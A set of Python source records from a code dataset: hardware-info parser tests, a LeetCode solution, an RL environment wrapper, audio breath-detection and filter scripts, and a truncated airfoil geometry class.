'name': name, 'visits': visits, 'cpc': cpc,\n 'costs': costs, 'currency': currency}\n\n L.append(prvekL)\n\n keys = ['name', 'visits', 'cpc', 'costs', 'currency', 'shop', 'date']\n\n with open('/data/out/tables/' + parameters.get('Entity').get(entity).get(login).get('Shop_name')[index] + '.csv', mode='a+', encoding='utf-8') as output_file:\n dict_writer = csv.DictWriter(output_file, keys, lineterminator='\\n', delimiter=',', quotechar='\"')\n dict_writer.writeheader()\n dict_writer.writerows(L)\n","sub_path":"main_new.py","file_name":"main_new.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"613030330","text":"#!/usr/bin/env python3\n\nfrom parsers import read_smartctl\nfrom parsers import read_decode_dimms\nfrom parsers import read_dmidecode\nfrom parsers import read_lspci_and_glxinfo\nfrom parsers import read_lscpu\nfrom tests.parsers.read_file import read_file\n\nfiledir = \"tests/source_files/polveroso/\"\n\n\ndef test_lspci():\n expect = [\n {\n \"type\": \"graphics-card\",\n \"working\": \"yes\",\n \"brand\": \"ASUSTeK Computer Inc.\",\n \"model\": \"GeForce 9400 GT\",\n \"internal-name\": \"G96\", # Missing glxinfo...\n \"brand-manufacturer\": \"Nvidia\",\n }\n ]\n # False to ignore missing glxinfo\n output = read_lspci_and_glxinfo.parse_lspci_and_glxinfo(False, read_file(filedir, \"lspci.txt\"), read_file(filedir, \"glxinfo.txt\"))\n\n assert output == expect\n\n\ndef test_lscpu():\n expect = [\n {\n \"type\": \"cpu\",\n \"working\": \"yes\",\n \"isa\": \"x86-64\",\n \"model\": \"Core 2 Duo E7300\",\n \"brand\": \"Intel\",\n \"core-n\": 2,\n \"thread-n\": 2,\n \"frequency-hertz\": 2660000000,\n }\n ]\n output = read_lscpu.parse_lscpu(read_file(filedir, \"lscpu.txt\"))\n\n assert output == expect\n\n\ndef test_ram():\n output = read_decode_dimms.parse_decode_dimms(read_file(filedir, \"dimms.txt\"))\n\n assert len(output) == 0\n\n\ndef test_baseboard():\n expect = {\n \"type\": \"motherboard\",\n \"working\": \"yes\",\n \"brand\": \"ASUSTeK Computer INC.\",\n \"model\": \"P5QL-E\",\n \"sn\": \"MS666999ABCDEF123\",\n }\n output = read_dmidecode._get_baseboard(read_file(filedir, \"baseboard.txt\"))\n\n assert output == expect\n\n\ndef test_connector():\n baseboard = read_dmidecode._get_baseboard(read_file(filedir, \"baseboard.txt\"))\n\n expect = {\n \"type\": \"motherboard\",\n \"working\": \"yes\",\n \"brand\": \"ASUSTeK Computer INC.\",\n \"model\": \"P5QL-E\",\n \"sn\": \"MS666999ABCDEF123\",\n \"ps2-ports-n\": 2,\n \"usb-ports-n\": 6,\n \"serial-ports-n\": 1,\n \"mini-jack-ports-n\": 1,\n \"ethernet-ports-n\": 1,\n \"ide-ports-n\": 1,\n \"sata-ports-n\": 6,\n \"esata-ports-n\": 1,\n \"firewire-ports-n\": 2,\n \"notes\": \"Unknown connector: None / Other (AUDIO / AUDIO)\",\n }\n output = read_dmidecode._get_connectors(read_file(filedir, \"connector.txt\"), baseboard)\n\n assert output == expect\n\n\ndef test_chassis():\n expect = [\n {\n \"type\": \"case\",\n \"brand\": \"Chassis Manufacture\",\n \"sn\": \"Chassis Serial Number\",\n }\n ]\n output = read_dmidecode.parse_case(read_file(filedir, \"chassis.txt\"))\n\n assert output == expect\n","sub_path":"tests/parsers/test_polveroso.py","file_name":"test_polveroso.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"329323811","text":"class Solution:\n def maxSum(self, nums1: List[int], nums2: List[int]) -> int:\n res, a, b, i, j, m, n=0, 0, 0, 0, 0, len(nums1), len(nums2)\n mod=10**9+7\n while inums2[j]):\n b+=nums2[j]\n j+=1\n else:\n res+=max(a, b)+nums1[i]\n a, b=0, 0\n i+=1\n j+=1\n return (res+max(a, b))%mod\n\n","sub_path":"python/get-the-maximum-score.py","file_name":"get-the-maximum-score.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"248063819","text":"from ant_environments.create_maze_env import create_maze_env\n\n\"\"\"Environments taken from HIRO paper github repo: https://github.com/tensorflow/models/tree/master/research/efficient-hrl\"\"\"\n\nclass Ant_Navigation_Environments():\n\n def __init__(self, environment_name):\n self.env = create_maze_env(env_name=environment_name).gym # names [\"AntGather\" ,\"AntMaze\", \"AntPush\", \"AntFall\", \"AntBlock\"]\n self.unwrapped = self.env.unwrapped\n self.spec = self.env.spec\n self.action_space = self.env.action_space\n\n def reset(self):\n self.steps_taken = 0\n return self.env.reset()\n\n def step(self, action):\n self.steps_taken += 1\n next_state, reward, _, _ = self.env.step(action)\n if self.steps_taken >= 500: done = True\n else: done = False\n return next_state, reward, done, _\n\n\n\n","sub_path":"Environments/Ant_Navigation_Environments.py","file_name":"Ant_Navigation_Environments.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"133244850","text":"import matplotlib.pyplot as plot\nimport math\nimport numpy as np\nfrom scipy import signal\n\n\ndef _EXIT_():\n print('Выход..')\n exit(0)\n\n\ndef INPUT():\n global str1\n str1 = input('ВВОД P: ')\n\n\ndef add_value_in_register(summator, value):\n for i in range(len(summator) - 1):\n summator[i] = summator[i + 1]\n summator[len(summator) - 1] = value\n\ndef get_summ(summator):\n result = 0\n for value in summator:\n result += value\n\n return result\n\ndef getResult(N, P):\n k = P / N\n # пустые массивы значений\n X = np.array(0)\n S = np.array(0)\n # частота пропускания и частота заграждения\n wp, ws = 0.2, 0.3\n # усиление в полосе пропускания и подавление вне её\n gpass, gstop = 0.1, 50.0\n\n b, a = signal.iirdesign(wp, ws, gpass, gstop, analog=False, ftype='butter', output='ba')\n w, h = signal.freqz(b, a)\n\n x_values = w/np.pi\n y_values = 20*np.log10(abs(h))\n return {'x_values': x_values, 'y_values': y_values}\n\n\ndef plotGraf(data, x_label=\"x_values\", y_label='y_values'):\n data_x = data[x_label]\n data_y = data[y_label]\n plot.ylabel('рис 1')\n plot.plot(data_x, data_y)\n\n\n\n\nif __name__ == \"__main__\":\n N = 100\n print('run task4')\n #INPUT()\n #P = int(str1)\n P = 15\n data = getResult(N, P)\n plot.subplot(311)\n plotGraf(data)\n plot.show()","sub_path":"task4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"246272942","text":"import sys\nfrom scipy.io import wavfile\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport peakutils\nfrom peakutils.plot import plot as pplot\nfrom matplotlib import pyplot\nfrom scipy.signal import butter, lfilter, freqz\n\n#class Event:\n#\tfloat timeStamp\n#\tfloat intensity\n#\tfloat duration\n\n##GLOBALS\norder = 6\nfs = 30.0\ncutoff = 3.667 \nSTEP = 1.0\n\ndef butter_lowpass(cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\ndef butter_lowpass_filter(data, cutoff, fs, order=5):\n b, a = butter_lowpass(cutoff, fs, order=order)\n y = lfilter(b, a, data)\n return y\n\ndef readAndExtract(filename):\n\t# Load the data and calculate the time of each sample\n\tsamplerate, y = wavfile.read(filename)\n\tx = np.arange(len(y))\n\t#Handle both mono and stereo audi\t\n\tif type(y[0]) == np.ndarray:\n\t\ty = y[0:len(y)-1:STEP, 1]\n\telse:\n\t\ty = y[0:len(y)-1:STEP]\n\ty = normalize(y)[0]\n\ty = butter_lowpass_filter(y, cutoff, fs, order)\n\tx = x[0:len(x)-1:STEP]\n\treturn x, y\n\ndef findPeaks(y):\n\treturn peakutils.indexes(y, thres=0.1, min_dist=44100)\n\ndef plot(x, y, indexes, breaths):\n\tpyplot.figure(figsize=(10,6))\n\tpplot(x, y, indexes)\n\tpyplot.title('Find peaks')\n\t#show breaths\n\tfor breath in breaths:\n\t\tpyplot.axvspan(breath[2], breath[3], color='y', alpha=0.5, lw=0)\n\t\n\tpyplot.show()\n\ndef normalize(a, axis=-1, order=2):\n l2 = np.atleast_1d(np.linalg.norm(a, order, axis))\n l2[l2==0] = 1\n return a / np.expand_dims(l2, axis)\n\ndef findBreaths(x, y, peaks):\n\tbreaths = []\n\tMAX_BREATH = 44100\n\tBYTE_SIZE = 5000\n\tTHRESH = .03\n\tbmin = None\n\tbmax = None\n\tfor peak in peaks:\n\t\tindex = peak - BYTE_SIZE\n\t\t#find begining of breath\n\t\twhile (index > peak-MAX_BREATH):\n\t\t\tsublist = y[(index)*STEP:(index + BYTE_SIZE)*STEP]\n\t\t\tif not len(sublist): break\n\t\t\tavg = sum([abs(x) for x in sublist])/len(sublist)\n\t\t\tif (abs(avg) < THRESH):\n\t\t\t\tbmin = index\n\t\t\t\tbreak\n\t\t\tindex = index - BYTE_SIZE\n\t\tif not bmin: bmin = index\n\t\tindex = peak\n\t\t\n\t\t#find end of breath\n\t\twhile (index < peak+MAX_BREATH):\n\t\t\tsublist = y[(index)*STEP:(index + BYTE_SIZE)*STEP]\n\t\t\tif not len(sublist): break\n\t\t\tavg = sum([abs(x) for x in sublist])/len(sublist)\n\t\t\tif (abs(avg) < THRESH):\n\t\t\t\tbmax = index\n\t\t\t\tbreak\n\t\t\tindex = index + BYTE_SIZE\n\t\tif not bmax: bmax = index\n\t\tbreaths.append([peak, y[peak], bmin, bmax])\n\t\tbmin = None\n\t\tbmax= None\n\treturn aggregate(breaths)\n\ndef aggregate(breaths):\n\ti = 0\n\twhile i < len(breaths)-1:\n\t\tif (breaths[i][3] > breaths[i+1][2]):\n\t\t\tbreaths[i][3] = breaths[i+1][3]\n\t\t\tbreaths[i][1] = max(breaths[i][1], breaths[i+1][1])\n\t\t\tdel breaths[i+1]\n\t\ti = i + 1\n\treturn breaths\n\ndef writeToFile(file, breaths):\n\tfile = open(file, 'w')\n\tfor breath in breaths:\n\t\tfor val in breath:\n\t\t\tfile.write(str(val)+\", \")\n\t\t\tprint(val)\n\t\tfile.write(\"\\n\")\n\t\tprint()\n\tfile.close()\n\nif (len(sys.argv)):\n\tfile = sys.argv[1]\nelse:\n\tfile = \"30sleep.wav\"\n\nx,y = readAndExtract(file)\npeaks = findPeaks(y)\nbreaths = findBreaths(x, y, peaks)\nwriteToFile('out.txt', breaths)\n#plot(x, y, peaks, breaths)\nprint(breaths)\n","sub_path":"api/pd2.py","file_name":"pd2.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"163855836","text":"\"\"\"A class defining an airfoil.\"\"\"\n\nimport math\nimport json\nimport copy\nimport os\nimport operator\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport scipy.interpolate as interp\nimport subprocess as sp\nimport numpy as np\n\nfrom .poly_fits import multivariablePolynomialFit, multivariablePolynomialFunction, autoPolyFit, multivariableRMS, multivariableR2\nfrom .exceptions import DatabaseBoundsError, CamberSolverNotConvergedError, PolyFitBoundsError\n\n\nclass Airfoil:\n \"\"\"A class defining an airfoil. If the airfoil geometry is defined using outline\n points, then when this class is initialized, a solver will be automatically\n run to determine the camber line and thickness distribution of the airfoil.\n The parameters \"camber_relaxation\", \"le_loc\", and \"camber_termination_tol\" then\n have bearing on this solver.\n\n When using the member methods get_CL, get_CD, get_Cm, get_CLa, get_CLM, get_CLRe,\n and get_aL0, the default parameters are dependent upon the type of airfoil.\n\n For all airfoil types except 'functional', 'alpha', 'trailing_flap_deflection',\n and 'trailing_flap_fraction' default to 0.0.\n\n For 'functional' airfoils, the defaults are specified by the user.\n\n For 'linear' airfoils, 'Mach' and 'Rey' have no effect on computations.\n\n For 'database' airfoils, 'Mach' and 'Rey' default to the average value in the database,\n if the database is dependent on that variable. Otherwise, they default to the value\n specified as constant when the database was generated.\n\n For 'poly_fit' airfoils, 'Mach' and 'Rey' default to the values given in the fit file.\n If export_polynomial_fits() is used, these values are the same as those for the \n 'database' type.\n\n Parameters\n ----------\n name : str\n Name of the airfoil.\n\n airfoil_input : dict or str\n Dictionary or path to JSON object describing the airfoil.\n\n verbose : bool, optional\n Whether to display information on the progress of parameterizing the geometry\n for an airfoil defined by a set of outline points. Defaults to False.\n\n camber_relaxation : float, optional\n A value between 0.0 and 1.0 that defines how much of the update at each\n iteration of the camber line solver should be accepted. Helpful for some\n poorly behaved cases. Defaults to 1.0 (full update).\n \n le_loc : list, optional\n Gives the location of the leading edge relative to the given points for an airfoil\n defined by a set of outline points. If this is given, the camber line will be forced\n to intersect this point. THIS POINT SHOULD LIE ON THE AIRFOIL OUTLINE. If not given,\n the camber line solver will try to iteratively find the leading edge (the point where\n the camber line intersects the front of the profile).\n\n camber_termination_tol : float, optional\n The tolerance below which the maximum approximate error in the camber line estimate\n must fall in order for the camber line solver to terminate. Defaults to 1e-10.\n\n max_iterations : int, optional\n Maximum number of iterations for the camber line solver. Defaults to 100.\n \"\"\"\n\n def __init__(self, name, airfoil_input, **kwargs):\n \n self.name = name\n self._load_params(airfoil_input)\n if \"camber_solver_kwargs\" in list(self._input_dict.keys()):\n kwarg_dict = self._input_dict[\"camber_solver_kwargs\"]\n self._verbose = kwarg_dict.get(\"verbose\", False)\n self._camber_relaxation = kwarg_dict.get(\"camber_relaxation\", 1.0)\n self._le_loc = kwarg_dict.get(\"le_loc\", None)\n self._camber_termination_tol = kwarg_dict.get(\"camber_termination_tol\", 1e-10)\n self._max_iterations = kwarg_dict.get(\"max_iterations\", 100)\n else:\n self._verbose = kwargs.get(\"verbose\", False)\n self._camber_relaxation = kwargs.get(\"camber_relaxation\", 1.0)\n self._le_loc = kwargs.get(\"le_loc\", None)\n self._camber_termination_tol = kwargs.get(\"camber_termination_tol\", 1e-10)\n self._max_iterations = kwargs.get(\"max_iterations\", 100)\n\n # Load flaps\n self._load_flaps()\n\n # Store undeformed outlines\n self._initialize_geometry()\n\n # Specify database DOF parameters\n self._allowable_dofs = [\"alpha\", \"Rey\", \"Mach\", \"trailing_flap_deflection\", \"trailing_flap_fraction\"]\n self._dof_defaults = {\n \"alpha\" : 0.0,\n \"Rey\" : 1e6,\n \"Mach\" : 0.0,\n \"trailing_flap_deflection\" : 0.0,\n \"trailing_flap_fraction\" : 0.0\n }\n\n # Load input file\n input_file = self._input_dict.get(\"input_file\", None)\n if input_file is not None:\n if self._type == \"database\":\n self.import_database(filename=input_file)\n elif self._type == \"poly_fit\":\n self.import_polynomial_fits(filename=input_file)\n\n\n self._raise_poly_bounds_error = True\n\n\n def set_err_state(self, **kwargs):\n \"\"\"Sets the error state for the airfoil. Each may be specified as 'raise' or 'ignore'.\n\n Parameters\n ----------\n poly_fit_bounds : str, optional\n How to handle PolyFitBoundsError. Defaults to 'raise'.\n \"\"\"\n\n # Polynomial fit bounds\n if kwargs.get(\"poly_fit_bounds\", \"raise\") == \"raise\":\n self._raise_poly_bounds_error = True\n else:\n self._raise_poly_bounds_error = False\n\n\n def set_verbosity(self, verbosity):\n \"\"\"Sets the verbosity of the airfoil.\"\"\"\n self._verbose = verbosity\n\n\n def set_type(self, database_type):\n \"\"\"Determines how the aerodynamic coefficients will be calculated.\n\n Parameters\n ----------\n database_type: str\n \"linear\", \"functional\", \"database\", or \"poly_fit\". Airfoil\n will automatically check if it has the necessary to perform\n the given type of computation and throw a warning if it does not.\n\n \"\"\"\n\n # Check for proper type spec\n if database_type not in [\"linear\", \"database\", \"poly_fit\", \"functional\"]:\n raise IOError(\"{0} is not a valid type specification.\".format(database_type))\n\n # Check for linear data\n if database_type == \"linear\":\n if not hasattr(self, \"_CLa\"):\n raise RuntimeWarning(\"Airfoil {0} does not have linear coefficients specified. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n # Check for database\n if database_type == \"database\":\n if not hasattr(self, \"_data\"):\n raise RuntimeWarning(\"Airfoil {0} does not have a database of coefficients. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n # Set up data normalization\n self._data_norms = np.zeros((1,self._num_dofs))\n for i in range(self._num_dofs):\n self._data_norms[0,i] = np.max(np.abs(self._data[:,i]))\n\n # Make sure we don't divide by zero\n self._data_norms[np.where(self._data_norms==0.0)] = 1.0\n\n # Normalize independent vars\n self._normed_ind_vars = self._data[:,:self._num_dofs]/self._data_norms\n\n # Determine default Mach and Reynolds number\n if \"Rey\" in list(self._dof_db_cols.keys()):\n i = self._dof_db_cols[\"Rey\"]\n Re_min = np.min(self._data[:,i])\n Re_max = np.max(self._data[:,i])\n self._dof_defaults[\"Rey\"] = 0.5*(Re_max+Re_min)\n\n if \"Mach\" in list(self._dof_db_cols.keys()):\n i = self._dof_db_cols[\"Mach\"]\n M_min = np.min(self._data[:,i])\n M_max = np.max(self._data[:,i])\n self._dof_defaults[\"Mach\"] = 0.5*(M_max+M_min)\n\n # Check for polynomial fits\n if database_type == \"poly_fit\":\n if not hasattr(self, \"_CL_poly_coefs\"):\n raise RuntimeWarning(\"Airfoil {0} does not have a set of polynomial fits. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n # Check for functional definition\n if database_type == \"functional\":\n if not hasattr(self, \"_CL\"):\n raise RuntimeWarning(\"Airfoil {0} does not have functional definitions of coefficients. Reverting to type '{1}' for computations.\".format(self.name, self._type))\n else:\n self._type = database_type\n\n\n def _load_params(self, airfoil_input):\n\n # Load input dict\n if isinstance(airfoil_input, str):\n # Load JSON object\n with open(airfoil_input, 'r') as json_handle:\n self._input_dict = json.load(json_handle)\n elif isinstance(airfoil_input, dict):\n self._input_dict = airfoil_input\n else:\n raise IOError(\"{0} is not an allowed airfoil definition. Must be path or dictionary.\".format(airfoil_input))\n\n # Store type\n self._type = self._input_dict.get(\"type\", \"linear\")\n\n # If linear, store coefficients\n if self._type == \"linear\":\n self._aL0 = self._input_dict.get(\"aL0\", 0.0)\n self._CLa = self._input_dict.get(\"CLa\", 2*np.pi)\n self._Cma = self._input_dict.get(\"Cma\", 0.0)\n self._CD0 = self._input_dict.get(\"CD0\", 0.0)\n self._CD1 = self._input_dict.get(\"CD1\", 0.0)\n self._CD2 = self._input_dict.get(\"CD2\", 0.0)\n self._CL_max = self._input_dict.get(\"CL_max\", np.inf)\n if abs(self._CL_max) < 1e-10:\n warnings.warn(\"You have specified a maximum lift coefficient of 0. Are you sure you want to do this?...\")\n self._CmL0 = self._input_dict.get(\"CmL0\", 0.0)\n\n # For functional, store functions\n elif self._type == \"functional\":\n self._CL = self._input_dict[\"CL\"]\n self._CD = self._input_dict[\"CD\"]\n self._Cm = self._input_dict[\"Cm\"]\n\n\n def _load_flaps(self):\n # Loads flaps based on the input dict\n self._trailing_flap_type = self._input_dict.get(\"trailing_flap_type\", None)\n self._trailing_flap_hinge_height = self._input_dict.get(\"trailing_flap_hinge_height\", 0.0)\n\n\n def _initialize_geometry(self):\n # Initialize geometry based on whether points or a NACA designation were given\n\n # Check that there's only one geometry definition\n geom_dict = self._input_dict.get(\"geometry\", {})\n outline_points = geom_dict.get(\"outline_points\", None)\n NACA = geom_dict.get(\"NACA\", None)\n if outline_points is not None and NACA is not None:\n raise IOError(\"Outline points and a NACA designation may not be both specified for airfoil {0}.\".format(self.name))\n\n # Check for user-given points\n if outline_points is not None:\n self.geom_specification = \"points\"\n\n # Array given\n if isinstance(outline_points, np.ndarray):\n self._raw_outline = outline_points\n\n # 2D list given\n elif isinstance(outline_points, list):\n self._raw_outline = np.array(outline_points)\n \n # File\n else:\n\n # Import\n with open(outline_points, 'r') as input_handle:\n self._raw_outline = np.genfromtxt(input_handle)\n\n # Check for comma-delimited\n if np.isnan(self._raw_outline).any():\n with open(outline_points, 'r') as input_handle:\n self._raw_outline = np.genfromtxt(input_handle, delimiter=',')\n\n # Get number of points\n self._N_orig = self._raw_outline.shape[0]\n\n # Rearrange the coordinates if necessary to be top first then bottom\n top_ind = np.argmax(self._raw_outline[:,1])\n bot_ind = np.argmin(self._raw_outline[:,1])\n if bot_ind < top_ind: # Bottom came first\n self._raw_outline = self._raw_outline[::-1]\n\n # Calculate camber line and thickness\n self._calc_geometry_from_points()\n\n # NACA definition\n elif NACA is not None:\n self.geom_specification = \"NACA\"\n self._naca_closed_te = geom_dict.get(\"NACA_closed_te\", False)\n self._naca_des = NACA\n\n self._calc_geometry_from_NACA()\n\n # No geometry given\n else:\n self.geom_specification = \"none\"\n self._max_camber = geom_dict.get(\"max_camber\", 0.0)\n self._max_thickness = geom_dict.get(\"max_thickness\", 0.0)\n return\n\n \n def _calc_geometry_from_NACA(self):\n # Creates thickness, camber, camber derivative, and outline splines base on the NACA equations\n\n # 4-digit series\n if len(self._naca_des) == 4:\n\n # Stores the camber and thickness getters based on the NACA designation of the airfoil\n self._m = float(self._naca_des[0])/100\n self._p = float(self._naca_des[1])/10\n self._t = float(self._naca_des[2:])/100\n self._max_camber = self._m\n self._max_thickness = self._t\n\n # Camber line\n def camber(x):\n if self._p != 0.0:\n return np.where(x self._camber_termination_tol:\n iteration += 1\n\n # Determine camber line slope\n dyc_dx = np.gradient(y_c, x_c, edge_order=camber_deriv_edge_order)\n \n # Determine slope of lines perpendicular to the camber\n with np.errstate(divide=\"ignore\"):\n b = -1.0/dyc_dx\n\n # Loop through points on the camber line to find where their normal intersects the outline\n for i in range(num_camber_points):\n if self._le_loc is not None and i == 0:\n continue\n\n # Get point information\n xc = x_c[i]\n yc = y_c[i]\n bi = b[i]\n\n # Estimate the intersection points\n x_t[i], y_t[i], _ = self._get_intersection_point(xc, yc, bi, \"top\")\n x_b[i], y_b[i], _ = self._get_intersection_point(xc, yc, bi, \"bottom\")\n\n # Calculate new camber line points\n x_c_new = 0.5*(x_t+x_b)\n y_c_new = 0.5*(y_t+y_b)\n if self._le_loc is not None:\n x_c_new[0] = self._le_loc[0]\n y_c_new[0] = self._le_loc[1]\n\n # Plot new and old estimate\n if False:\n plt.figure()\n plt.plot(self._raw_outline[:,0], self._raw_outline[:,1], 'b-', label='Outline Data')\n plt.plot(x_c, y_c, 'r--', label='Old Camber Line Estimate')\n plt.plot(x_c_new, y_c_new, 'g--', label='New Camber Line Estimate')\n plt.plot(x_t, y_t, 'rx')\n plt.plot(x_b, y_b, 'ro')\n plt.legend()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Approximate error\n x_diff = x_c_new-x_c\n y_diff = y_c_new-y_c\n camber_error = np.max(np.sqrt(x_diff*x_diff+y_diff*y_diff))\n if self._verbose:\n print(\"{0:<20}{1:<20}\".format(iteration, camber_error))\n\n # Sort, just in case things got messed up\n sorted_ind = np.argsort(x_c_new)\n x_c_new = x_c_new[sorted_ind]\n y_c_new = y_c_new[sorted_ind]\n\n # Update for next iteration\n x_c = self._camber_relaxation*x_c_new+(1.0-self._camber_relaxation)*x_c\n y_c = self._camber_relaxation*y_c_new+(1.0-self._camber_relaxation)*y_c\n\n # Check iteration limit\n if iteration == self._max_iterations:\n raise CamberSolverNotConvergedError(self.name, camber_error)\n\n if self._verbose: print(\"Camber line solver converged.\")\n\n # Calculate where the camber line intersects the outline to find the leading edge\n if self._le_loc is None:\n dyc_dx = np.gradient(y_c, x_c, edge_order=2)\n b = dyc_dx[0]\n x_le, y_le, self._s_le = self._get_intersection_point(x_c[0], y_c[0], b, \"leading_edge\")\n le = np.array([x_le, y_le])\n x_c = np.insert(x_c, 0, le[0])\n y_c = np.insert(y_c, 0, le[1])\n else:\n le = self._le_loc\n\n if self._verbose: print(\"Leading edge: {0}\".format(le))\n\n if self._verbose:\n # Plot\n plt.figure()\n plt.plot(self._raw_outline[:,0], self._raw_outline[:,1], 'b-', label='Outline Data')\n plt.plot(x_c, y_c, 'g--', label='Final Camber Line Estimate')\n plt.legend()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Get trailing edge\n te = (self._raw_outline[0]+self._raw_outline[-1])*0.5\n if self._verbose: print(\"Trailing edge: {0}\".format(te))\n\n # Renormalize using new leading and trailing edge\n self._normalize_points(self._raw_outline, le, te)\n self._x_outline, self._y_outline = self._create_splines_of_s(self._raw_outline)\n\n # Normalize camber line points\n camber_points = np.concatenate([x_c[:,np.newaxis], y_c[:,np.newaxis]], axis=1)\n self._normalize_points(camber_points, le, te)\n\n # Store camber and max camber\n self._camber_line = interp.UnivariateSpline(camber_points[:,0], camber_points[:,1], k=5, s=1e-10)\n self._max_camber = np.max(camber_points[:,1])\n\n # Store camber line derivative\n y_c = self._camber_line(x_space)\n dyc_dx= np.gradient(y_c, x_space)\n self._camber_deriv = interp.UnivariateSpline(x_space, dyc_dx, k=5, s=1e-10)\n with np.errstate(divide=\"ignore\"):\n b = -1.0/dyc_dx\n\n # Find points on the surface to determine the thickness\n if self._verbose: print(\"Calculating thickness distribution...\", end=\"\")\n x_t_t = np.zeros_like(x_space)\n x_b_t = np.zeros_like(x_space)\n y_t_t = np.zeros_like(x_space)\n y_b_t = np.zeros_like(x_space)\n for i, xc in enumerate(x_space):\n if i == 0: continue # This point intersects the outline by definition and so will have zero thickness\n yc = y_c[i]\n bi = b[i]\n\n x_t_t[i], y_t_t[i],_ = self._get_intersection_point(xc, yc, bi, \"top\")\n x_b_t[i], y_b_t[i],_ = self._get_intersection_point(xc, yc, bi, \"bottom\")\n\n # Store thickness distribution\n t = 0.5*np.sqrt((x_t_t-x_b_t)*(x_t_t-x_b_t)+(y_t_t-y_b_t)*(y_t_t-y_b_t))\n self._thickness = interp.UnivariateSpline(x_space, t, k=5, s=1e-10)\n self._max_thickness = np.max(t)\n if self._verbose: print(\"Done\")\n\n # Calculate estimated top and bottom points\n y_c_pred = self._camber_line(x_space)\n dyc_dx = np.gradient(y_c_pred, x_space)\n t_pred = self._thickness(x_space)\n theta = np.arctan(dyc_dx)\n S_theta = np.sin(theta)\n C_theta = np.cos(theta)\n\n x_b = x_space+t_pred*S_theta\n y_b = y_c_pred-t_pred*C_theta\n x_t = x_space-t_pred*S_theta\n y_t = y_c_pred+t_pred*C_theta\n \n # Plot\n if self._verbose:\n plt.plot(self._raw_outline[:,0], self._raw_outline[:,1], 'b-', label='Original Data')\n plt.plot(x_t, y_t, 'r--', label='Top Fit')\n plt.plot(x_b, y_b, 'r--', label='Bottom Fit')\n plt.legend()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n\n def _normalize_points(self, points, le_coords, te_coords):\n # Takes the given points, translates them to the origin, rotates them to be at zero angle of attack, and scales so the chord length is unity\n\n # Translate\n points[:,0] -= le_coords[0]\n points[:,1] -= le_coords[1]\n\n # Rotate\n x_diff = te_coords[0]-le_coords[0]\n y_diff = te_coords[1]-le_coords[1]\n theta = -np.arctan2(y_diff, x_diff)\n R = np.array([[np.cos(theta), -np.sin(theta)],\n [np.sin(theta), np.cos(theta)]])\n points = np.matmul(R, points.T)\n\n #Scale\n c_unscaled = np.sqrt(x_diff*x_diff+y_diff*y_diff)\n points = points/c_unscaled\n\n\n def _get_intersection_point(self, xc, yc, b, surface, plot=False):\n # Calculates the point on the surface where the line extending from (xc, yc) with slope of b intersects\n # Uses the secant method to converge in s\n\n # Start s in the middle of the respective surface\n if surface == \"top\":\n s0 = 0.24\n s1 = 0.26\n elif surface == \"bottom\":\n s0 = 0.74\n s1 = 0.76\n elif surface == \"leading_edge\":\n s0 = 0.49\n s1 = 0.51\n\n # Initial points on outline\n x0 = self._x_outline(s0)\n y0 = self._y_outline(s0)\n x1 = self._x_outline(s1)\n y1 = self._y_outline(s1)\n\n # Initial distances\n d0 = self._distance(x0, y0, xc, yc, b)\n d1 = self._distance(x1, y1, xc, yc, b)\n\n # Secant method\n while abs(d1) > 1e-10:\n \n # Get new estimate in s\n if d1 > 0.2 or (s1 > 0.35 and s1 < 0.65): # Apply some relaxation when we're far away or near the leading edge (to keep from shooting to the other surface)\n s2 = s1-0.2*d1*(s0-s1)/(d0-d1)\n else:\n s2 = s1-d1*(s0-s1)/(d0-d1)\n\n # Make sure we're in bounds\n if s2 > 1.1:\n s2 = 1-0.01*s2\n if s2 < -0.1:\n s2 = -0.01*s2\n\n # Get new point\n x2 = self._x_outline(s2)\n y2 = self._y_outline(s2)\n\n # Get new distance\n d2 = self._distance(x2, y2, xc, yc, b)\n\n # Plot\n if plot:\n plt.figure()\n s_space = np.linspace(0.0, 1.0, 10000)\n plt.plot(self._x_outline(s_space), self._y_outline(s_space), 'b')\n plt.plot(xc, yc, 'or')\n plt.plot(x0, y0, 'bx')\n plt.plot(x1, y1, 'gx')\n plt.plot(x2, y2, 'rx')\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n # Update for next iteration\n s0 = s1\n d0 = d1\n x0 = x1\n y0 = y1\n\n s1 = s2\n d1 = d2\n x1 = x2\n y1 = y2\n\n return x1, y1, s1\n\n\n def _distance(self, x0, y0, x, y, b):\n if not np.isnan(b) and not np.isinf(b):\n return (-b*x0+y0+b*x-y)/np.sqrt(b*b+1)\n else:\n return abs(x0-x)\n\n\n def check_against_NACA(self, naca_des):\n \"\"\"Checks the error in the camber and thickness against that predicted by the NACA equations. This is recommended as a check for the user\n if unusual geometries are being imported. Checks against the open trailing edge formulation of the NACA equations.\n\n Parameters\n ----------\n naca_des : str\n NACA designation of the airfoil to compare against as a string. May only be 4-digit series.\n \"\"\"\n\n print(\"Checking estimated thickness and camber against NACA equations for NACA {0}...\".format(naca_des))\n\n # 4-digit series\n if len(naca_des) == 4:\n\n # Generate true coordinates\n x_space = np.linspace(0.0, 1.0, 10000)\n m = 